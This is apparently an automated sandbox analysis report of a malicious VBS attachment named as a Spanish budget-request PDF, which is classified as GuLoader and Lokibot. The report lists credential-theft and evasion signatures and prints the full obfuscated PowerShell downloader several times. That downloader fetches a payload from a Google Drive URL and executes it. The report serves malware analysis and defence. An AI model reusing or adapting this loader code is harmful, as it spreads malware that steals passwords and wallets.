Overview

overview

10

Static

static

1

Solicitud ...df.vbs

windows7-x64

10

Solicitud ...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-09-2024 14:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Solicitud De Presupuesto 09-16-2024·pdf.vbs

  • Size

    37KB

  • MD5

    2f3b50537c5d1377ac4dfd11e3b0e9da

  • SHA1

    003bd5a1d5cdc1b68ae1429e38a64a713e6ccc71

  • SHA256

    24bbc0768eee5c4f4d6c3d199295009fb24d285e8f3cec509b755de4c25e8c80

  • SHA512

    b04cf4da54fb02125bfaf4ff7b7342d47ccafc9d7073a9d97169503fd0fcc2cdff93b04de6ca1a953fa12fb842cf2a6d44d7e9ca220eb7ca50ec02b05dec2dc4

  • SSDEEP

    384:Z9vOg3rNR7SuYXMr0PAayFLPlkOCnEfA8BFg8e3StKqo/tv0yxJHqMUaYQ3K:Zp3rNhvrwgdlkXw//tK7/x7Yz

Score
10/10
guloaderlokibotcollectioncredential_accessdiscoverydownloaderspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud De Presupuesto 09-16-2024·pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Desorganiseredes Pyramideselskab Tjenestevogne Silkesommerfugles #>;$Krogster='Esdragons';<#Repellant Telephonical Islamize Nierens Terrazzo #>;$Corintha=$host.PrivateData;If ($Corintha) {$Allopathically201++;}function benignant($Sopransaxofonernes43){$Disponibel237=$Sopransaxofonernes43.Length-$Allopathically201;for( $Lettende=5;$Lettende -lt $Disponibel237;$Lettende+=6){$Amtshospitalet+=$Sopransaxofonernes43[$Lettende];}$Amtshospitalet;}function Illuminate($Billiggres){ . ($Rewriting) ($Billiggres);}$Kolonneformats=benignant 'FolkeM Nym.opostpzBu uni CololorbiclIdioca abel/ Prot5Ap.ea.Nonim0Ovi.o Dagg (.koldWm ksii Ant.n BraddBaluso nstywCo,kasKad.g ,erstNDistaTCur,i Outsm1Lie,t0skudv.Bj.in0Angul;trlgn tepaWUdkraiHe epnSulte6Skruk4Illum;Outji Haa dxBobbi6 Frem4 atel;Rever BlairrTilbavInstr:Overk1D,eli2 Illa1 Holo.Stick0 Smin) obbe BellyG RemaeOmnorcAvlinkSadomoKontr/Ferti2Angst0uncas1 Mi,g0forpl0 Hume1spge.0 aske1Viki, GulerFbetraiBkkenrR sureUngdofSaturosynsixNa ur/Undga1bar,t2Therm1 D ce.Kamme0Tapre ';$Extensional=benignant 'TrreruAfskaSAltitedisfarCount-SandwaYean.gDisauEstrepnP nsutN,kro ';$Sympathising=benignant 'Betokh Dvrgt L.gwt PolepOejens V.lu:vorac/Myela/T eeddP,ecarKvartiDr,itvTho.seMouss.Andrug ProdoeuthaoskiftgSurhelRend.eAvert.SeawecPlu boInburm Biks/NeminuSleekcSkade?Arr seKanalxMidstpKon po cyklrHu kotTen e=AgathdStadso Bellw nemn kriglStetsoRetinaSkelsdmonni&Antiqi SheddIndls= Tite1 Sept1 Bensb notfYVillauDem,bWDe urRA fgasLydig1platiL tpa_ PagawSkrmmOAtricpOrlo PFradrqspareqElegiqSe.tenOs meBHel e2tagdk1Vaads7UnmoriFamesq Induq BolszEgoceWAffalaScorpASeman5 Navn7 Supe6Fljet ';$Somberly=benignant 'R,con>Svine ';$Rewriting=benignant 'Sger.ISpeirE podoxMasse ';$argusblikkenes='Seeress';$skrvebetonerne = benignant 'dagpaeNaur.cDura.h arifoBlaap skrin%Mond,a,repppEkspepBlackdTransa intt Vella mona%A.tin\ detaPO hreoForeclantifyMeninpch orhAffalojo rnbMotoriLokuma nuti.rallecSvimlhScopor Cher Klokk&Isopa&tanks Amy oeSoltrcHoflehBruseoPr co Over,tFuppe ';Illuminate (benignant 'Aircr$SkrumgSanselRegeno Vamob h nka DemolSmelt:FogleJFortioTripuuInte rExpednInc ia K mnlPara.iTilsmsUnappewishbrConfee Naugn AricdErotoeT lst=Unm s(RyotscB,achmGlacid Varm Udpan/AnkomcPlump Decli$F ingspassikOrthor An tvWheyseNoncobD.tabeUndertRoul,oDemilnAcci eSuperr kelenExtraeSpild)St,rs ');Illuminate (benignant 'Farin$BetjegFelo.lFors oGevrkbWife aSubtrlTolkn:FilmeHAtwiroFolsomO yceoUltraioverroAdvaruOs,eosSammeiSc.weaVaricnEks.a=Bisam$Bit eS Modey Anc mmi impReperaBystyt Su ehTrevliCaphisMrkvri N genEgotrgU sti. bibls Ory p KraflSubmaigraphtDusse(Sashe$ Mo fSa chooL.nirm lsgrb arneeOverbrMurrslAdelsydanma)Maldi ');Illuminate (benignant 'Karto[Ursk NAtombeS ntit Ned .Alie.SFradre BlehrSyva,vMezaiiOvertcAlligeGrim,PWauchoWhangiP,olenper otSelvhMEgbata unden lskva an,egStosheBryggrImmor]Forha:kod i:Ti.reSDdirreUpflac Phenu Balsr PolyiPr,mit obbeyTeamaPKsendrReap,o randtMnt,eo paltcRett oZealolGless Usvig=Fore Subga[DipnoNEpiple WalltPorce.Afle,S BianeFrottcEternu .uggr.kmtei Allet atmyPens PUniqurForm oUdkketDiseno OligcCineaoEsocilVi ifT SkriyO.erbpWincheBeco.]Rembo:p.esb: ,ickTClauslPel isFildi1Firel2raadg ');$Sympathising=$Homoiousian[0];$Tewing= (benignant 'Hunde$Prelig ,ntilAntidoGenerBComp ATil,tl Ste,:,andsHtetraoVulcaMKrafto T,arNRestsYforfrMunitee poreSTrac = Kaf N B vaEIn erWSheet-Indt O ,odkBBedrijPo teENytaaCAnkehTAgter Hunchsthe.ryForhiSputtaTHave,eBug.pm Yeel.Muz rnByboee CabaTTalep.StormwTrkloE uverbIsog CSpeciLbl myi FaneEMerlon agrat');$Tewing+=$Journaliserende[1];Illuminate ($Tewing);Illuminate (benignant ' Fi a$HornbH FlatoCo ubmForhaoSupern Tegnyeyep mBlikdetnd msSkaal. apilH Evene hecka flstdafsineD pkorJord,sProse[ Misu$chasiETaccaxSprint ynsmeH poan Kel s alici HalooAmicanFi fia redlS.eri]Dawsp=Brneb$ Hie KSuperoHol glAsymmoTilesnHea.en UnhueMela fChadooSk dur F ulmothe aRorpitSi.hos Esco ');$Sensationelt=benignant 'Br,ge$ Mi rHFdr loB,awsmTagetoIsbryn MyteyCromlmcatcheForsaspriv,. SupeD GrinoAp stwFadernBefollFjer oGygesaArtildLeje,FOvermiEnervlUndgaeNati.( O,er$HysteSArea,ySpinamUnaffpNaetha e oit monghResbeiFemogsstr,pi HvornBravagStrik,perse$LrkerT Ramsa ecilCarbokSoliciSup rn Pe cgSvovl)Isdes ';$Talking=$Journaliserende[0];Illuminate (benignant ' aafe$HielaGS igelSh ieoD,monB Minea vet LB rgo:VldedtNou.eAEx anl Platl edbaSExacteBogfiSM lli=K pre(Thi,ut sek,ECourtSStemmtpurre-WritePDatosAReoleTU,ivah Bru Elvr$Hya,ot consaAtlanLSkolekRgto,iProgrnimmung.dluf)Lufth ');while (!$Tallses) {Illuminate (benignant 'Erst $traf,gAmo il ehebouns,obIgraiaChinqlMunds:MokkaHEnr,boSub bbStyggeadsti=Skriv$Acr.ntEmpowr .alcuKuf,yeEll t ') ;Illuminate $Sensationelt;Illuminate (benignant 'TermiSPhalatSkidtaHeterrMercitBusga- Bo mSFire lLiguseSpasmeLowripwight Spl 4 ,elt ');Illuminate (benignant ' Juba$SnydegMintmlNemo,oSub ubShil,a s ltlMicro:PhasiTG ecia issolAnnihlInseqsPrehyeD ynasKonkr=Unsta( all,TMalade.raves ntictFrugt- EighPYamaha tontS roghk ige Resil$HrderT Traba PolylArtikk luksi ResonUde ogdybtr)S,ive ') ;Illuminate (benignant 'Tren.$eftergAna.tlHenveoCluppbSva.taTermilUdvok:HaandESmr ecUns ic UnadlCopro=Udbrn$ De,tg Sr elHjtidoNabovbAds rateks lMenuk:OverwBSkyenu Gra n Is skZe ue+Idole+ Band%Unrue$I,tfaHInstroHummemNaunto AfskiDimoloAflveuSansesIglooiMedi.aSnd rnSinog.Budg cSalvio.lankuForgrnVestetIndav ') ;$Sympathising=$Homoiousian[$Eccl];}$Pariasaurus=286978;$drumheads=29373;Illuminate (benignant 'Strum$ ircugFugitl Elpro Skilbbant aUn,unlakkor:ma,gfFTsader ReveeOddsee verrlFeereo,lattaMinimdKn cke kulsdPsyke Venst=Jehus Pr,buG AppeeAngivtSpect-fagk C Z,dloCu icnOverptUnde eFlnsen onsatPe rl Stran$Iden,TsphenaBibetlBl etkSubcuiLvensnSkuffg Ty o ');Illuminate (benignant 'Te ri$OpkasgGlycol andioCuckqbEncepaBirkelSkema: Su,uDSyncheMonishChattysynondflyverDesigoTeolog Indhe gambnspecia CapttLame,eReforseksek Sigtn= eobj Skrif[ BephSGedebyUdspisK nemtJeaneeNightmBehan.FolkeC VedioBarben Paa v okose Unorrdiamat ump] Leuc:Uover: mhttFDa bcrtrimpo ,agemPhyllBGumwoa ntrsT.alpeRevan6Stjyl4 FuseS .roetDatabr Dan iAbonnn GrizgSolso( ndes$ForbiFseriorrddikeTele eKurvfl,likkoAsfreaLyco dKnatte Gidsds rec)Nedri ');Illuminate (benignant 'Stret$DrikkgIna,gl Chamo ThunbTapl aTi hel Flym: EvneMU pinoFodsvn AutoaMedbesZulubtimpreeCru,brUnfraiRun sa IntelskimmlStokry.demo myt,l=Pseud Shera[unadoSA timyPr ntsCaseltKuvereScreemTryki.R,gneTFir ee eillxcypritSk.ve.SallyE atinTortucUnderoMikr d Dea iL.tmenJellig Over]Indbi:Achen:Inve,ACome SPlutoCTankeISmi eI Pjat.AfledGTil ne PlustFalkoS.ontrtDilapr ntesiin ldn kvalgButan( Bunk$ ClifDTropaeSkaanh SoleyAmanudFyldnrUnderoSlaskgExotieCryptnAntigaoverpt Ved eSllersD ase)Skrum ');Illuminate (benignant 'Spist$HomoggFusspltilskoBoundbDurabaSnufflHplas:Ka muE FraglSpectoMavefrFor igWhik,lS,tsseSkattt InulsAfskr= Maes$SidesMIntrao enannCykelaStikpsUdfldtTow.leRestirMegatiUvanea.esorl Selvlarbe.yUndet.Wit,asSem nuFlag bCen tsAdenot AargrTanghiLangsnFortjgDupli( Ko v$MetodP Pr,ba vulrLngodiYndliaEnsbesM kniaSubdeu Ko fr AftruB agusPrisf, Akk $Tortud.verfr.purguR.dskmNozz.hFjerteAerifaStomad.rbejsTapn,) Vrdi ');Illuminate $Elorglets;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4404
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Polyphobia.chr && echo t"
        3⤵
          PID:384
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Desorganiseredes Pyramideselskab Tjenestevogne Silkesommerfugles #>;$Krogster='Esdragons';<#Repellant Telephonical Islamize Nierens Terrazzo #>;$Corintha=$host.PrivateData;If ($Corintha) {$Allopathically201++;}function benignant($Sopransaxofonernes43){$Disponibel237=$Sopransaxofonernes43.Length-$Allopathically201;for( $Lettende=5;$Lettende -lt $Disponibel237;$Lettende+=6){$Amtshospitalet+=$Sopransaxofonernes43[$Lettende];}$Amtshospitalet;}function Illuminate($Billiggres){ . ($Rewriting) ($Billiggres);}$Kolonneformats=benignant 'FolkeM Nym.opostpzBu uni CololorbiclIdioca abel/ Prot5Ap.ea.Nonim0Ovi.o Dagg (.koldWm ksii Ant.n BraddBaluso nstywCo,kasKad.g ,erstNDistaTCur,i Outsm1Lie,t0skudv.Bj.in0Angul;trlgn tepaWUdkraiHe epnSulte6Skruk4Illum;Outji Haa dxBobbi6 Frem4 atel;Rever BlairrTilbavInstr:Overk1D,eli2 Illa1 Holo.Stick0 Smin) obbe BellyG RemaeOmnorcAvlinkSadomoKontr/Ferti2Angst0uncas1 Mi,g0forpl0 Hume1spge.0 aske1Viki, GulerFbetraiBkkenrR sureUngdofSaturosynsixNa ur/Undga1bar,t2Therm1 D ce.Kamme0Tapre ';$Extensional=benignant 'TrreruAfskaSAltitedisfarCount-SandwaYean.gDisauEstrepnP nsutN,kro ';$Sympathising=benignant 'Betokh Dvrgt L.gwt PolepOejens V.lu:vorac/Myela/T eeddP,ecarKvartiDr,itvTho.seMouss.Andrug ProdoeuthaoskiftgSurhelRend.eAvert.SeawecPlu boInburm Biks/NeminuSleekcSkade?Arr seKanalxMidstpKon po cyklrHu kotTen e=AgathdStadso Bellw nemn kriglStetsoRetinaSkelsdmonni&Antiqi SheddIndls= Tite1 Sept1 Bensb notfYVillauDem,bWDe urRA fgasLydig1platiL tpa_ PagawSkrmmOAtricpOrlo PFradrqspareqElegiqSe.tenOs meBHel e2tagdk1Vaads7UnmoriFamesq Induq BolszEgoceWAffalaScorpASeman5 Navn7 Supe6Fljet ';$Somberly=benignant 'R,con>Svine ';$Rewriting=benignant 'Sger.ISpeirE podoxMasse ';$argusblikkenes='Seeress';$skrvebetonerne = benignant 'dagpaeNaur.cDura.h arifoBlaap skrin%Mond,a,repppEkspepBlackdTransa intt Vella mona%A.tin\ detaPO hreoForeclantifyMeninpch orhAffalojo rnbMotoriLokuma nuti.rallecSvimlhScopor Cher Klokk&Isopa&tanks Amy oeSoltrcHoflehBruseoPr co Over,tFuppe ';Illuminate (benignant 'Aircr$SkrumgSanselRegeno Vamob h nka DemolSmelt:FogleJFortioTripuuInte rExpednInc ia K mnlPara.iTilsmsUnappewishbrConfee Naugn AricdErotoeT lst=Unm s(RyotscB,achmGlacid Varm Udpan/AnkomcPlump Decli$F ingspassikOrthor An tvWheyseNoncobD.tabeUndertRoul,oDemilnAcci eSuperr kelenExtraeSpild)St,rs ');Illuminate (benignant 'Farin$BetjegFelo.lFors oGevrkbWife aSubtrlTolkn:FilmeHAtwiroFolsomO yceoUltraioverroAdvaruOs,eosSammeiSc.weaVaricnEks.a=Bisam$Bit eS Modey Anc mmi impReperaBystyt Su ehTrevliCaphisMrkvri N genEgotrgU sti. bibls Ory p KraflSubmaigraphtDusse(Sashe$ Mo fSa chooL.nirm lsgrb arneeOverbrMurrslAdelsydanma)Maldi ');Illuminate (benignant 'Karto[Ursk NAtombeS ntit Ned .Alie.SFradre BlehrSyva,vMezaiiOvertcAlligeGrim,PWauchoWhangiP,olenper otSelvhMEgbata unden lskva an,egStosheBryggrImmor]Forha:kod i:Ti.reSDdirreUpflac Phenu Balsr PolyiPr,mit obbeyTeamaPKsendrReap,o randtMnt,eo paltcRett oZealolGless Usvig=Fore Subga[DipnoNEpiple WalltPorce.Afle,S BianeFrottcEternu .uggr.kmtei Allet atmyPens PUniqurForm oUdkketDiseno OligcCineaoEsocilVi ifT SkriyO.erbpWincheBeco.]Rembo:p.esb: ,ickTClauslPel isFildi1Firel2raadg ');$Sympathising=$Homoiousian[0];$Tewing= (benignant 'Hunde$Prelig ,ntilAntidoGenerBComp ATil,tl Ste,:,andsHtetraoVulcaMKrafto T,arNRestsYforfrMunitee poreSTrac = Kaf N B vaEIn erWSheet-Indt O ,odkBBedrijPo teENytaaCAnkehTAgter Hunchsthe.ryForhiSputtaTHave,eBug.pm Yeel.Muz rnByboee CabaTTalep.StormwTrkloE uverbIsog CSpeciLbl myi FaneEMerlon agrat');$Tewing+=$Journaliserende[1];Illuminate ($Tewing);Illuminate (benignant ' Fi a$HornbH FlatoCo ubmForhaoSupern Tegnyeyep mBlikdetnd msSkaal. apilH Evene hecka flstdafsineD pkorJord,sProse[ Misu$chasiETaccaxSprint ynsmeH poan Kel s alici HalooAmicanFi fia redlS.eri]Dawsp=Brneb$ Hie KSuperoHol glAsymmoTilesnHea.en UnhueMela fChadooSk dur F ulmothe aRorpitSi.hos Esco ');$Sensationelt=benignant 'Br,ge$ Mi rHFdr loB,awsmTagetoIsbryn MyteyCromlmcatcheForsaspriv,. SupeD GrinoAp stwFadernBefollFjer oGygesaArtildLeje,FOvermiEnervlUndgaeNati.( O,er$HysteSArea,ySpinamUnaffpNaetha e oit monghResbeiFemogsstr,pi HvornBravagStrik,perse$LrkerT Ramsa ecilCarbokSoliciSup rn Pe cgSvovl)Isdes ';$Talking=$Journaliserende[0];Illuminate (benignant ' aafe$HielaGS igelSh ieoD,monB Minea vet LB rgo:VldedtNou.eAEx anl Platl edbaSExacteBogfiSM lli=K pre(Thi,ut sek,ECourtSStemmtpurre-WritePDatosAReoleTU,ivah Bru Elvr$Hya,ot consaAtlanLSkolekRgto,iProgrnimmung.dluf)Lufth ');while (!$Tallses) {Illuminate (benignant 'Erst $traf,gAmo il ehebouns,obIgraiaChinqlMunds:MokkaHEnr,boSub bbStyggeadsti=Skriv$Acr.ntEmpowr .alcuKuf,yeEll t ') ;Illuminate $Sensationelt;Illuminate (benignant 'TermiSPhalatSkidtaHeterrMercitBusga- Bo mSFire lLiguseSpasmeLowripwight Spl 4 ,elt ');Illuminate (benignant ' Juba$SnydegMintmlNemo,oSub ubShil,a s ltlMicro:PhasiTG ecia issolAnnihlInseqsPrehyeD ynasKonkr=Unsta( all,TMalade.raves ntictFrugt- EighPYamaha tontS roghk ige Resil$HrderT Traba PolylArtikk luksi ResonUde ogdybtr)S,ive ') ;Illuminate (benignant 'Tren.$eftergAna.tlHenveoCluppbSva.taTermilUdvok:HaandESmr ecUns ic UnadlCopro=Udbrn$ De,tg Sr elHjtidoNabovbAds rateks lMenuk:OverwBSkyenu Gra n Is skZe ue+Idole+ Band%Unrue$I,tfaHInstroHummemNaunto AfskiDimoloAflveuSansesIglooiMedi.aSnd rnSinog.Budg cSalvio.lankuForgrnVestetIndav ') ;$Sympathising=$Homoiousian[$Eccl];}$Pariasaurus=286978;$drumheads=29373;Illuminate (benignant 'Strum$ ircugFugitl Elpro Skilbbant aUn,unlakkor:ma,gfFTsader ReveeOddsee verrlFeereo,lattaMinimdKn cke kulsdPsyke Venst=Jehus Pr,buG AppeeAngivtSpect-fagk C Z,dloCu icnOverptUnde eFlnsen onsatPe rl Stran$Iden,TsphenaBibetlBl etkSubcuiLvensnSkuffg Ty o ');Illuminate (benignant 'Te ri$OpkasgGlycol andioCuckqbEncepaBirkelSkema: Su,uDSyncheMonishChattysynondflyverDesigoTeolog Indhe gambnspecia CapttLame,eReforseksek Sigtn= eobj Skrif[ BephSGedebyUdspisK nemtJeaneeNightmBehan.FolkeC VedioBarben Paa v okose Unorrdiamat ump] Leuc:Uover: mhttFDa bcrtrimpo ,agemPhyllBGumwoa ntrsT.alpeRevan6Stjyl4 FuseS .roetDatabr Dan iAbonnn GrizgSolso( ndes$ForbiFseriorrddikeTele eKurvfl,likkoAsfreaLyco dKnatte Gidsds rec)Nedri ');Illuminate (benignant 'Stret$DrikkgIna,gl Chamo ThunbTapl aTi hel Flym: EvneMU pinoFodsvn AutoaMedbesZulubtimpreeCru,brUnfraiRun sa IntelskimmlStokry.demo myt,l=Pseud Shera[unadoSA timyPr ntsCaseltKuvereScreemTryki.R,gneTFir ee eillxcypritSk.ve.SallyE atinTortucUnderoMikr d Dea iL.tmenJellig Over]Indbi:Achen:Inve,ACome SPlutoCTankeISmi eI Pjat.AfledGTil ne PlustFalkoS.ontrtDilapr ntesiin ldn kvalgButan( Bunk$ ClifDTropaeSkaanh SoleyAmanudFyldnrUnderoSlaskgExotieCryptnAntigaoverpt Ved eSllersD ase)Skrum ');Illuminate (benignant 'Spist$HomoggFusspltilskoBoundbDurabaSnufflHplas:Ka muE FraglSpectoMavefrFor igWhik,lS,tsseSkattt InulsAfskr= Maes$SidesMIntrao enannCykelaStikpsUdfldtTow.leRestirMegatiUvanea.esorl Selvlarbe.yUndet.Wit,asSem nuFlag bCen tsAdenot AargrTanghiLangsnFortjgDupli( Ko v$MetodP Pr,ba vulrLngodiYndliaEnsbesM kniaSubdeu Ko fr AftruB agusPrisf, Akk $Tortud.verfr.purguR.dskmNozz.hFjerteAerifaStomad.rbejsTapn,) Vrdi ');Illuminate $Elorglets;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3544
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Desorganiseredes Pyramideselskab Tjenestevogne Silkesommerfugles #>;$Krogster='Esdragons';<#Repellant Telephonical Islamize Nierens Terrazzo #>;$Corintha=$host.PrivateData;If ($Corintha) {$Allopathically201++;}function benignant($Sopransaxofonernes43){$Disponibel237=$Sopransaxofonernes43.Length-$Allopathically201;for( $Lettende=5;$Lettende -lt $Disponibel237;$Lettende+=6){$Amtshospitalet+=$Sopransaxofonernes43[$Lettende];}$Amtshospitalet;}function Illuminate($Billiggres){ . ($Rewriting) ($Billiggres);}$Kolonneformats=benignant 'FolkeM Nym.opostpzBu uni CololorbiclIdioca abel/ Prot5Ap.ea.Nonim0Ovi.o Dagg (.koldWm ksii Ant.n BraddBaluso nstywCo,kasKad.g ,erstNDistaTCur,i Outsm1Lie,t0skudv.Bj.in0Angul;trlgn tepaWUdkraiHe epnSulte6Skruk4Illum;Outji Haa dxBobbi6 Frem4 atel;Rever BlairrTilbavInstr:Overk1D,eli2 Illa1 Holo.Stick0 Smin) obbe BellyG RemaeOmnorcAvlinkSadomoKontr/Ferti2Angst0uncas1 Mi,g0forpl0 Hume1spge.0 aske1Viki, GulerFbetraiBkkenrR sureUngdofSaturosynsixNa ur/Undga1bar,t2Therm1 D ce.Kamme0Tapre ';$Extensional=benignant 'TrreruAfskaSAltitedisfarCount-SandwaYean.gDisauEstrepnP nsutN,kro ';$Sympathising=benignant 'Betokh Dvrgt L.gwt PolepOejens V.lu:vorac/Myela/T eeddP,ecarKvartiDr,itvTho.seMouss.Andrug ProdoeuthaoskiftgSurhelRend.eAvert.SeawecPlu boInburm Biks/NeminuSleekcSkade?Arr seKanalxMidstpKon po cyklrHu kotTen e=AgathdStadso Bellw nemn kriglStetsoRetinaSkelsdmonni&Antiqi SheddIndls= Tite1 Sept1 Bensb notfYVillauDem,bWDe urRA fgasLydig1platiL tpa_ PagawSkrmmOAtricpOrlo PFradrqspareqElegiqSe.tenOs meBHel e2tagdk1Vaads7UnmoriFamesq Induq BolszEgoceWAffalaScorpASeman5 Navn7 Supe6Fljet ';$Somberly=benignant 'R,con>Svine ';$Rewriting=benignant 'Sger.ISpeirE podoxMasse ';$argusblikkenes='Seeress';$skrvebetonerne = benignant 'dagpaeNaur.cDura.h arifoBlaap skrin%Mond,a,repppEkspepBlackdTransa intt Vella mona%A.tin\ detaPO hreoForeclantifyMeninpch orhAffalojo rnbMotoriLokuma nuti.rallecSvimlhScopor Cher Klokk&Isopa&tanks Amy oeSoltrcHoflehBruseoPr co Over,tFuppe ';Illuminate (benignant 'Aircr$SkrumgSanselRegeno Vamob h nka DemolSmelt:FogleJFortioTripuuInte rExpednInc ia K mnlPara.iTilsmsUnappewishbrConfee Naugn AricdErotoeT lst=Unm s(RyotscB,achmGlacid Varm Udpan/AnkomcPlump Decli$F ingspassikOrthor An tvWheyseNoncobD.tabeUndertRoul,oDemilnAcci eSuperr kelenExtraeSpild)St,rs ');Illuminate (benignant 'Farin$BetjegFelo.lFors oGevrkbWife aSubtrlTolkn:FilmeHAtwiroFolsomO yceoUltraioverroAdvaruOs,eosSammeiSc.weaVaricnEks.a=Bisam$Bit eS Modey Anc mmi impReperaBystyt Su ehTrevliCaphisMrkvri N genEgotrgU sti. bibls Ory p KraflSubmaigraphtDusse(Sashe$ Mo fSa chooL.nirm lsgrb arneeOverbrMurrslAdelsydanma)Maldi ');Illuminate (benignant 'Karto[Ursk NAtombeS ntit Ned .Alie.SFradre BlehrSyva,vMezaiiOvertcAlligeGrim,PWauchoWhangiP,olenper otSelvhMEgbata unden lskva an,egStosheBryggrImmor]Forha:kod i:Ti.reSDdirreUpflac Phenu Balsr PolyiPr,mit obbeyTeamaPKsendrReap,o randtMnt,eo paltcRett oZealolGless Usvig=Fore Subga[DipnoNEpiple WalltPorce.Afle,S BianeFrottcEternu .uggr.kmtei Allet atmyPens PUniqurForm oUdkketDiseno OligcCineaoEsocilVi ifT SkriyO.erbpWincheBeco.]Rembo:p.esb: ,ickTClauslPel isFildi1Firel2raadg ');$Sympathising=$Homoiousian[0];$Tewing= (benignant 'Hunde$Prelig ,ntilAntidoGenerBComp ATil,tl Ste,:,andsHtetraoVulcaMKrafto T,arNRestsYforfrMunitee poreSTrac = Kaf N B vaEIn erWSheet-Indt O ,odkBBedrijPo teENytaaCAnkehTAgter Hunchsthe.ryForhiSputtaTHave,eBug.pm Yeel.Muz rnByboee CabaTTalep.StormwTrkloE uverbIsog CSpeciLbl myi FaneEMerlon agrat');$Tewing+=$Journaliserende[1];Illuminate ($Tewing);Illuminate (benignant ' Fi a$HornbH FlatoCo ubmForhaoSupern Tegnyeyep mBlikdetnd msSkaal. apilH Evene hecka flstdafsineD pkorJord,sProse[ Misu$chasiETaccaxSprint ynsmeH poan Kel s alici HalooAmicanFi fia redlS.eri]Dawsp=Brneb$ Hie KSuperoHol glAsymmoTilesnHea.en UnhueMela fChadooSk dur F ulmothe aRorpitSi.hos Esco ');$Sensationelt=benignant 'Br,ge$ Mi rHFdr loB,awsmTagetoIsbryn MyteyCromlmcatcheForsaspriv,. SupeD GrinoAp stwFadernBefollFjer oGygesaArtildLeje,FOvermiEnervlUndgaeNati.( O,er$HysteSArea,ySpinamUnaffpNaetha e oit monghResbeiFemogsstr,pi HvornBravagStrik,perse$LrkerT Ramsa ecilCarbokSoliciSup rn Pe cgSvovl)Isdes ';$Talking=$Journaliserende[0];Illuminate (benignant ' aafe$HielaGS igelSh ieoD,monB Minea vet LB rgo:VldedtNou.eAEx anl Platl edbaSExacteBogfiSM lli=K pre(Thi,ut sek,ECourtSStemmtpurre-WritePDatosAReoleTU,ivah Bru Elvr$Hya,ot consaAtlanLSkolekRgto,iProgrnimmung.dluf)Lufth ');while (!$Tallses) {Illuminate (benignant 'Erst $traf,gAmo il ehebouns,obIgraiaChinqlMunds:MokkaHEnr,boSub bbStyggeadsti=Skriv$Acr.ntEmpowr .alcuKuf,yeEll t ') ;Illuminate $Sensationelt;Illuminate (benignant 'TermiSPhalatSkidtaHeterrMercitBusga- Bo mSFire lLiguseSpasmeLowripwight Spl 4 ,elt ');Illuminate (benignant ' Juba$SnydegMintmlNemo,oSub ubShil,a s ltlMicro:PhasiTG ecia issolAnnihlInseqsPrehyeD ynasKonkr=Unsta( all,TMalade.raves ntictFrugt- EighPYamaha tontS roghk ige Resil$HrderT Traba PolylArtikk luksi ResonUde ogdybtr)S,ive ') ;Illuminate (benignant 'Tren.$eftergAna.tlHenveoCluppbSva.taTermilUdvok:HaandESmr ecUns ic UnadlCopro=Udbrn$ De,tg Sr elHjtidoNabovbAds rateks lMenuk:OverwBSkyenu Gra n Is skZe ue+Idole+ Band%Unrue$I,tfaHInstroHummemNaunto AfskiDimoloAflveuSansesIglooiMedi.aSnd rnSinog.Budg cSalvio.lankuForgrnVestetIndav ') ;$Sympathising=$Homoiousian[$Eccl];}$Pariasaurus=286978;$drumheads=29373;Illuminate (benignant 'Strum$ ircugFugitl Elpro Skilbbant aUn,unlakkor:ma,gfFTsader ReveeOddsee verrlFeereo,lattaMinimdKn cke kulsdPsyke Venst=Jehus Pr,buG AppeeAngivtSpect-fagk C Z,dloCu icnOverptUnde eFlnsen onsatPe rl Stran$Iden,TsphenaBibetlBl etkSubcuiLvensnSkuffg Ty o ');Illuminate (benignant 'Te ri$OpkasgGlycol andioCuckqbEncepaBirkelSkema: Su,uDSyncheMonishChattysynondflyverDesigoTeolog Indhe gambnspecia CapttLame,eReforseksek Sigtn= eobj Skrif[ BephSGedebyUdspisK nemtJeaneeNightmBehan.FolkeC VedioBarben Paa v okose Unorrdiamat ump] Leuc:Uover: mhttFDa bcrtrimpo ,agemPhyllBGumwoa ntrsT.alpeRevan6Stjyl4 FuseS .roetDatabr Dan iAbonnn GrizgSolso( 